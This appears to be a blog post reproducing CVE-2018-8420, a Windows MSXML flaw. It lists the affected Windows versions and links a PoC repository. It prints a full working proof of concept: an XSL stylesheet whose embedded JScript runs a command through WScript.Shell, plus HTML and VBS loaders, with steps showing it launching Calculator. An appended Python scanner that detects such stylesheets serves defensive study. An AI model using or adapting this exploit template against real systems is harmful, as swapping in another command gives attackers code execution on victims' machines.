  • CVE-2018-8420 Vulnerability Reproduction

    Affected Windows versions:

    Microsoft Windows 10 Version 1607 for 32-bit Systems
    Microsoft Windows 10 Version 1607 for x64-based Systems
    Microsoft Windows 10 Version 1803 for 32-bit Systems
    Microsoft Windows 10 Version 1803 for x64-based Systems
    Microsoft Windows 10 for 32-bit Systems
    Microsoft Windows 10 for x64-based Systems
    Microsoft Windows 10 version 1703 for 32-bit Systems
    Microsoft Windows 10 version 1703 for x64-based Systems
    Microsoft Windows 10 version 1709 for 32-bit Systems
    Microsoft Windows 10 version 1709 for x64-based Systems
    Microsoft Windows 7 for 32-bit Systems SP1
    Microsoft Windows 7 for x64-based Systems SP1
    Microsoft Windows 8.1 for 32-bit Systems
    Microsoft Windows 8.1 for 64-bit Systems
    Microsoft Windows RT 8.1
    Microsoft Windows Server 1709
    Microsoft Windows Server 1803
    Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
    Microsoft Windows Server 2008 R2 for x64-based Systems SP1
    Microsoft Windows Server 2008 for 32-bit Systems SP2
    Microsoft Windows Server 2008 for Itanium-based Systems SP2
    Microsoft Windows Server 2008 for x64-based Systems SP2
    Microsoft Windows Server 2012
    Microsoft Windows Server 2012 R2
    Microsoft Windows Server 2016

    Reproducing the vulnerability:

    Local test system: Microsoft Windows Server 2008 R2 Datacenter

    PoC: https://github.com/Sch01ar/CVE-2018-8420

    xml (launches Calculator)

    <?xml version='1.0'?>
    <stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
    <output method="text"/>
     <ms:script implements-prefix="user" language="JScript">
     <![CDATA[
     var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
     ]]> </ms:script>
    </stylesheet>

    html

    <script type="text/vbscript">
    Sub POC()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "xml.xml"
    XML.transformNode xsl
    End Sub
    POC()
    </script>
    

    vbs

    Sub Dummy()
    Set XML = CreateObject("Microsoft.XMLDOM")
    XML.async = False
    Set xsl = XML
    xsl.Load "xml.xml"
    XML.transformNode xsl
    End Sub
    Dummy()
    

    Open xml.html

    Click Yes

    Click Yes again

    Calculator launches successfully

    Run xml.vbs directly

    Calculator launches here as well
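
    A defender-side check for the technique shown above, as an added example that is not part of the original post or the PoC repository: it parses a stylesheet and reports script elements in the urn:schemas-microsoft-com:xslt namespace, matching on the namespace URI rather than the prefix. The function name, token list and sample documents are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace URI the PoC binds to the "ms" prefix; the prefix itself is arbitrary.
MS_XSLT_NS = "urn:schemas-microsoft-com:xslt"
# Object-creation calls worth surfacing in a script body (illustrative list, an assumption).
RISKY_TOKENS = ("ActiveXObject", "CreateObject", "GetObject", "WScript.Shell")

def scan_stylesheet(data: bytes) -> list:
    """Return one finding per script element in the Microsoft XSLT namespace."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [{"kind": "unparseable", "detail": str(exc)}]
    findings = []
    for el in root.iter():
        # ElementTree expands prefixes, so ms:script and q:script compare equal here.
        if el.tag != "{%s}script" % MS_XSLT_NS:
            continue
        body = "".join(el.itertext()).lower()
        findings.append({
            "kind": "msxsl-script",
            "language": el.get("language", ""),
            "tokens": [t for t in RISKY_TOKENS if t.lower() in body],
        })
    return findings

# Constructed samples. SAMPLE_MS mirrors the layout of xml.xml above (without the Run call).
SAMPLE_MS = b"""<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
 xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
 <output method="text"/>
 <ms:script implements-prefix="user" language="JScript"><![CDATA[
 var r = new ActiveXObject("WScript.Shell");
 ]]></ms:script>
</stylesheet>"""
# Same content under a different prefix: a text search for "ms:script" would miss it.
SAMPLE_RENAMED = SAMPLE_MS.replace(b"xmlns:ms=", b"xmlns:q=").replace(b"ms:script", b"q:script")
# Plain stylesheet with no embedded script.
SAMPLE_CLEAN = b"""<?xml version='1.0'?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
 <xsl:output method="text"/>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("ms", SAMPLE_MS), ("renamed", SAMPLE_RENAMED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_stylesheet(doc))
```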

  • Original article: https://www.cnblogs.com/sch01ar/p/10159380.html